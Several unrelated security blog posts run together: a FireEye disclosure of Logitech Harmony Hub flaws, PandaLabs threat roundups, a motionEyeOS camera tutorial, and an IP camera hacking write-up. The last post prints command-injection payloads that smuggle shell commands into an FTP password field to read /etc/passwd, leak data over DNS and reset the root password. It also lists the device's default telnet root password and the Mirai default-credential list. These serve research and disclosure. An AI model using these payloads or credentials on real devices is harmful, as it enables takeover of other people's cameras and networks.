      FireEye’s Mandiant Red Team recently discovered vulnerabilities present on the Logitech Harmony Hub Internet of Things (IoT) device that could potentially be exploited, resulting in root access to the device via SSH. The Harmony Hub is a home control system designed to connect to and control a variety of devices in the user’s home. Exploitation of these vulnerabilities from the local network could allow an attacker to control the devices linked to the Hub as well as use the Hub as an execution space to attack other devices on the local network. As the Harmony Hub device list includes support for devices such as smart locks, smart thermostats as well as other smart home devices, these vulnerabilities present a very high risk to the users.

      FireEye disclosed these vulnerabilities to Logitech in January 2018. Logitech was receptive and has coordinated with FireEye to release this blog post in conjunction with a firmware update (4.15.96) to address these findings.

      The Red Team discovered the following vulnerabilities:

      • Improper certificate validation
      • Insecure update process
      • Developer debugging symbols left in the production firmware image
      • Blank root user password

      The Red Team used a combination of the vulnerabilities to gain administrative access to the Harmony Hub. This blog post outlines the discovery and analysis process, and demonstrates the necessity of rigorous security testing of consumer devices – particularly as the public places an increasing amount of trust in devices that are not just connected to home networks, but also give access to many details about the daily lives of their users.

      Device Analysis

      Device Preparation

      Publicly available research indicated the presence of a universal asynchronous receiver/transmitter (UART) interface on some of the test points on the Harmony Hub. We soldered jumper wires to the test pads, which allowed us to connect to the Harmony Hub using a TTL to USB serial cable. Initial analysis of the boot process showed that the Harmony Hub booted via U-Boot 1.1.4 and ran a Linux kernel (Figure 1).


      Figure 1: Initial boot log output from UART interface

      After this point in the boot process, the console stopped returning output because the kernel was not configured with any console interfaces. We reconfigured the kernel boot parameters in U-Boot to inspect the full boot process, but no useful information was recovered. Furthermore, because the UART interface was configured to only transmit, no further interaction could be performed with the Harmony Hub on this interface. Therefore, we shifted our focus to gaining a better understanding of the Linux operating system and associated software running on the Harmony Hub.

      Firmware Recovery and Extraction

      The Harmony Hub is designed to pair with a companion Android or iOS application over Bluetooth for its initial configuration. We created a wireless network with hostapd and installed a Burp Suite Pro CA certificate on a test Android device to intercept traffic sent by the Harmony mobile application to the Internet and to the Harmony Hub. Once initial pairing is complete, the Harmony application searches for Harmony Hubs on the local network and communicates with the Harmony Hub over an HTTP-based API.

      Once connected, the Harmony application sends two different requests to Harmony Hub’s API, which cause the Harmony Hub to check for updates (Figure 2).


      Figure 2: A query to force the Harmony Hub to check for updates

      The Harmony Hub sends its current firmware version to a Logitech server to determine if an update is available (Figure 3). If an update is available, the Logitech server sends a response containing a URL for the new firmware version (Figure 4). Despite using a self-signed certificate to intercept the HTTPS traffic sent by the Harmony Hub, we were able to observe this process – demonstrating that the Harmony Hub ignores invalid SSL certificates.


      Figure 3: The Harmony Hub checks for updates to its firmware


      Figure 4: The server sends a response with a URL for the updated firmware

      We retrieved this firmware and examined the file. After extracting a few layers of archives, the firmware can be found in the harmony-image.squashfs file. This filesystem image is a SquashFS filesystem compressed with lzma, a common format for embedded devices. However, vendors often use old versions of squashfstools that are incompatible with more recent squashfstools builds. We used the unsqashfs_all.sh script included in firmware-mod-kit to automate the process of finding the correct version of unsquashfs to extract the filesystem image (Figure 5).


      Figure 5: Using firmware-mod-kit to extract the filesystem

      With the filesystem contents extracted, we investigated some of the configuration details of the Harmony Hub’s operating system. Inspection revealed that various debug details were available in the production image, such as kernel modules that were not stripped (Figure 6).


      Figure 6: Unstripped Linux kernel objects on the filesystem

      Investigation of /etc/passwd showed that the root user had no password configured (Figure 7). Therefore, if we can enable the dropbear SSH server, we can gain root access to the Harmony Hub through SSH without a password.


      Figure 7: /etc/passwd shows no password is configured for the root user

      We observed that an instance of a dropbear SSH server will be enabled during initialization if the file /etc/tdeenable is present in the filesystem (Figure 8).


      Figure 8: A dropbear SSH server is enabled by /etc/init.d/rcS script if /etc/tdeenable is present

      Hijacking Update Process

      During the initialization process, the Harmony Hub queries the GetJson2Uris endpoint on the Logitech API to obtain a list of URLs to use for various processes (Figure 9), such as the URL to use when checking for updated firmware or a URL to obtain information about updates’ additional software packages.


      Figure 9: The request to obtain a list of URL endpoints for various processes

      We intercepted and modified the JSON object in the response from the server to point the GetUpdates member to our own IP address, as shown in Figure 10.


      Figure 10: The modified JSON object member

      Similar to the firmware update process, the Harmony Hub sends a POST request to the endpoint specified by GetUpdates containing the current versions of its internal software packages. The request shown in Figure 11 contains a sample request for the HEOS package.


      Figure 11: The JSON request object containing the current version of the “HEOS” package

      If the sysBuild parameter in the POST request body does not match the current version known by the server, the server responds with an initial response containing information about the new package version. For an undetermined reason, the Harmony Hub ignores this initial response and sends a second request. The second response contains multiple URLs pointing to the updated package, as shown in Figure 12.


      Figure 12: The JSON response containing URLs for the software update

      We downloaded and inspected the .pkg files listed in the response object, which are actually just ZIP archives. The archives contain a simple file hierarchy, as shown in Figure 13.


      Figure 13: The .pkg archive file hierarchy

      The manifest.json file contains information used to instruct the Harmony Hub’s update process on how to handle the archive’s contents (Figure 14).


      Figure 14: The contents of the manifest.json file

      The Harmony Hub’s update process executes the script provided by the installer parameter of the manifest if it is present within the archive. We modified this script, as shown in Figure 15, to create the /etc/tdeenable file, which causes the boot process to enable the SSH interface as previously described.


      Figure 15: The modified update.sh file

      We created a new malicious archive with the appropriate .pkg extension, which was hosted on a local web server. The next time the Harmony Hub checked for updates against the URL supplied in the modified GetJson2URIs response, we sent a modified response to point to this update. The Harmony Hub retrieved our malicious update package, and after rebooting the Harmony Hub, the SSH interface was enabled. This allowed us to access the device with the username root and a blank password, as shown in Figure 16.


      Figure 16: The SSH interface was enabled after a reboot

      Conclusion

      As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Due to the fact that the Harmony Hub, like many IoT devcies, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack. However, Logitech worked with our team to quickly address the vulnerabilities with their current firmware, 4.15.96. Developers of the devices we place our trust should be vigilant when removing potential attack vectors that could expose end users to security risks. We also want to share Logitech’s statement on the research and work by the Red Team:

      "At Logitech, we take our customers’ security and privacy very seriously. In late January 2018, security research firm FireEye pointed out vulnerabilities that could impact Logitech Harmony Hub-based products*.

      If a malicious hacker had already gained access to a Hub-users network, these vulnerabilities could be exploited. We appreciate the work that professional security research firms like FireEye provide when identifying these types of vulnerabilities on IoT devices.

      As soon as FireEye shared their research findings with us, we reviewed internally and immediately started to develop firmware to address it. As of April 10, we have released firmware that addresses all of the vulnerabilities that were identified. For any customers who haven’t yet updated to firmware version 4.15.96, we recommend you check the MyHarmony software and sync your Hub-based remote and receive it. Complete directions on updating your firmware can be found here.

      *Hub-based products include: Harmony Elite, Harmony Home Hub, Harmony Ultimate Hub, harmony Hub, Harmony Home Control, Harmony Pro, Harmony Smart Control, Harmony Companion, Harmony Smart Keyboard, Harmony Ultimate and Ultimate Home."

      The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report

      q1 headline image - blog

      Developments in Cyber-crime, Cyberwarfare and AI mark the first quarter of 2017, as indicated by PandaLabs Q1 Report. The Report by Panda Security’s malware resource facility identifies prominent tactics, attack methods and shifts in the industry.

      The Cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and organisations like Vdos, an organisation specialising in DDos attacks, indicate the professionalism of the cyber-crime industry. In Q1 we continue to see new and adapted attack methods such as RDPatcher, malware detected by PandaLabs in its attempt to access the victim’s endpoint and prepare it for rental on the Dark Web.

      Politically motivated cyber-attacks

      Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, Cyberwarfare has become a popular tactic in enforcing political agendas. In Q4 of 2016, we saw some of the first high profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity the development is clear as countries like Germany have now begun to develop cyber-command centres to monitor online activity – this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

      Targeted IoT device attacks

      Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a Smart TV using only a DDT signal.

      A perfect device for eavesdropping

      Recent developments in Robotics and AI have led to that belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs – introducing virtual assistants like Google Home and Amazon Echo, can become a dangerous in road for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on – making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence that could be useful to their case.

      Over the course of 2016 Ransomware attacks earned criminals billions of Rand. Fueled by its profitability, Ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered Ransomware variant WYSEWYE -that allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give back control to the victim.

      See the full report by PandaLabs here.

      The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

      Cyber Security Predictions for 2017

      Pandalabs-summer16

      Analysis

      2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

      Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

      Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

      Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

      If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


      Ranking the top attacks of 2016

      art-blog


      Ransomware

      We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

      Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

      In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

      Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.


      Malicious email

      Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


      Business Email Compromise Phishing

      Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

      A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

      In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.

      smartphones-blog


      Mobile Devices

      SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

      Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

      In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.


      Internet of Things

      Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

      Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.

      cybersecurity3


      Cyberwarfare

      2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

      In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

      At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

      On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

      In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


      Cybercrime

      In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

      In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

      One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

      In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


      DDoS Attacks

      In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

      In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

      In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.

      pandasecurity-punkeyPOS-principal1


      POS’s and Credit Cards

      The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

      Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


      Financial Institutions

      This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

      Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.

      blog


      Social Networks

      The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

      On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

      This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

      Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

      What cyber nightmares does 2017 have in store for us?


      Ransomware

      Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

      Taking every idea into consideration


      Companies

      Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

      Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


      Internet of Things

      Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


      DDoS

      The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

      These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


      Mobile Phones

      The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

      To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


      Cyberwarfare

      We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

      Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

      A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

      The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

      Toolsmith In-depth Analysis: motionEyeOS for Security Makers



      It's rather hard to believe, unimaginable even, but here we are. This is the 120th consecutive edition of toolsmith; every month for the last ten years, I've been proud to bring you insights and analysis on free and open source security tools. I hope you've enjoyed the journey as much as I have, I've learned a ton and certainly hope you have too. If you want a journey through the past, October 2006 through August 2015 are available on my web site here, in PDF form, and many year's worth have been published here on the blog as well.
      I labored a bit on what to write about for this 10th Anniversary Edition and settled on something I have yet to cover, a physical security topic. To that end I opted for a very slick, maker project, using a Raspberry Pi 2, a USB web cam, and motionEyeOS. Per Calin Crisan, the project developer, motionEyeOS is a Linux distribution that turns a single-board computer into a video surveillance system. The OS is based on BuildRoot and uses motion as a backend and motionEye for the frontend.
      • Buildroot "is a simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation."
      • Motion (wait for it) is a program that monitors the video signal from cameras and is able to detect if a significant part of the picture has changed; in other words, it can detect motion.
      • motionEye is also Calin's project and is web frontend for the motion daemon.

      Installation was insanely easy, I followed Calin's installation guidelines and used Win32DiskImager to write the image to the SD card. Here's how straightforward it was in summary.
      1) Download the latest motionEyeOS image. I used build 20160828 for Raspberry Pi 2.
      2) Write the image to SD card, insert the SD into your Pi.
      3) Plug a supported web camera in to your Pi, power up the Pi. Give it a couple minutes after first boot per the guidelines: do not disconnect or reboot your board during these first two minutes. The initialization steps:
      • prepare the data partition on the SD card
      • configure SSH remote access
      • auto-configure any detected camera devices
      4) Determine the IP addressed assigned to the Pi, DHCP is default. You can do this with a monitor plugged in the the Pi's HDMI port, via your router's connected devices list, or with a network scan.
      For detailed installation instructions, refer to PiMyLifeUp's Build a Raspberry Pi Security Camera Network. It refers to a dated, differently named (motionPie) version of motionEyeOS, but provides great detail if you need it. There are a number of YouTube videos too, just search motionEyeOS.

      Configuration is also ridiculously simple. Point your browser to the IP address for the Pi, http://192.168.248.20 for me on my wired network, and http://192.168.248.64 once I configured motionEyeOS to use my WiFi dongle.
      The first time you login, the password is blank so change that first. In the upper left corner of the UI you'll see a round icon with three lines, that's the setting menu. Click it, change your admin and user (viewer) passwords STAT. Then immediately enable Advanced Settings.
      Figure 1: Preferences

      You'll definitely want to add a camera, and keep in mind, you can manage multiple cameras with on motionEyeOS devices, and even multiple motionEyeOS systems with one master controller. Check out Usage Scenarios for more.
      Figure 2: Add a camera

      Once your camera is enabled, you'll see its feed in the UI. Note that there are unique URLs for snapshots, streaming and embedding.

      Figure 3: Active camera and URLs
      When motion detection has enabled the camera, the video frame in the UI will be wrapped in orange-red. You can also hover over the video frame for additional controls such as full screen and immediate access to stored video.

      There are an absolute plethora of settings options, the most important of which, after camera configuration, is storage. You can write to local storage or a network share, this quickly matters if you choose and always-on scenario versus motion enabled.
      Figure 4: Configure file storage
      You can configure text overlay, video streaming, still images, schedules, and more.
      Figure 5: Options, options, options
      The most important variable of all us how you want to be notified. 
      There are configuration options that allow you to run commands so you script up a preferred process or use one already devised.
      Figure 6: Run a command for notification

      Best of all, you can make uses of a variety of notification services including email, as well as Pushover, and IFTTT via Web Hooks.
      Figure 7: Web Hook notifications
      There is an outstanding article on using Pushover and IFTTT on Pi Supply's Maker Zone. It makes it easy to leverage such services even if you haven't done so before.
      The net result, after easy installation, and a little bit of configuration is your on motion-enabled CCTV system that costs very little compared to its commercial counterparts.
      Figure 8: Your author entering his office under the watchful eye of Camera1
      Purists will find image quality a bit lacking perhaps, but with the right camera you can use Fast Network Camera. Do be aware of the drawbacks though (lost functionality).

      In closing, I love this project. Kudos to Calin Crisan for this project. Makers and absolute beginners alike can easily create a great motion enabled video/still camera setup, or a network of managed cameras with always on video. The hardware is inexpensive and readily available. If you've not explored Raspberry Pi this is a great way to get started. If you're looking for a totally viable security video monitoring implementation, motionEyeOS and your favorite IoT hardware (the project supports other boards too) are a perfect combo. Remember too that there are Raspberry Pi board-specific camera modules available.

      Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
      Cheers…until next time.

      How I hacked my IP camera, and found this backdoor account

      The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the cheapest among all others, my expectations regarding security was low. But this camera was still able to surprise me.

      Maybe I will disclose the camera model used in my hack in this blog later, but first I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem, because they share being developed on the same SDK. Again, my expectations are low on this.

      The obvious problems



      I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch it's output video, and so on. Most people don't care to change this anyway.

      It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

      Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password is sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in 
      "C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

      This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong and China. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

      Let's run a quick nmap on this device.
      PORT     STATE SERVICE    VERSION
      23/tcp   open  telnet     BusyBox telnetd
      81/tcp   open  http       GoAhead-Webs httpd
      | http-auth: 
      | HTTP/1.1 401 Unauthorized
      |_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
      |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
      |_http-title: Document Error: Unauthorized
      8600/tcp open  tcpwrapped
      The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27 page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

      The double blind command injection

      The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately it was not working at all, I got invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems which made the exploitation harder. I call this vulnerability double blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleeps was not a real solution.
      But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
      $(ping%20-c%202%20%60pwd%60)
      or cleaned up after URL decode:
      $(ping -c 2 `pwd`)
      but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

      Following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
      $(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name
      $(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row
      $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
      $(ping `cat /tmp/c`)           ;leak it via DNS
      After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

      I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double blind hack was a bit too much for this automated tool unfortunately.



      But after spending way too much time without progress, I finally found the password to Open Sesame.
      $(echo 'root:passwd'|chpasswd)
      Now, logging in via telnet
      (none) login: root
      Password:

      BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
      Enter 'help' for a list of built-in commands.
      #

      Woot woot :) I quickly noticed the root of the command injection problem:

      # cat /tmp/ftpupdate.sh
      /system/system/bin/ftp -n<<!
      open ftp.site.com 21
      user ftpuser $(echo 'root:passwd'|chpasswd)
      binary
      mkdir  PSD-111111-REDACT
      cd PSD-111111-REDACT
      lcd /tmp
      put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
      close
      bye

      Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panick that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password. 

      root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

      Unfortunately there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.



      It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
      With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.

      Last but not least everything is running as root, which is not surprising. 

      My hardening list

      I added these lines to the end of /system/init/ipcam.sh:
      sleep 15
      echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
      Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

      If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
      iptables -A OUTPUT -p udp ! --dport 53 -j DROP
      You can use OpenVPN to connect into your home network, and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

      My TODO list

      • Investigate the script /system/system/bin/gmail_thread
      • Investigate the cloud protocol * - see update 2016 10 27
      • Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
      A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump. 

      And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


      When in the next episode of Mr Robot you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.

      If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

      Update: as you can see on the following screenshot, the bad guys already started to take advantege of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

      Update 20161006: The Mirai source code has been leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.

      root     xc3511
      root     vizxv
      root     admin
      admin    admin
      root     888888
      root     xmhdipc
      root     default
      root     juantech
      root     123456
      root     54321
      support  support
      root     (none)
      admin    password
      root     root
      root     12345
      user     user
      admin    (none)
      root     pass
      admin    admin1234
      root     1111
      admin    smcadmin
      admin    1111
      root     666666
      root     password
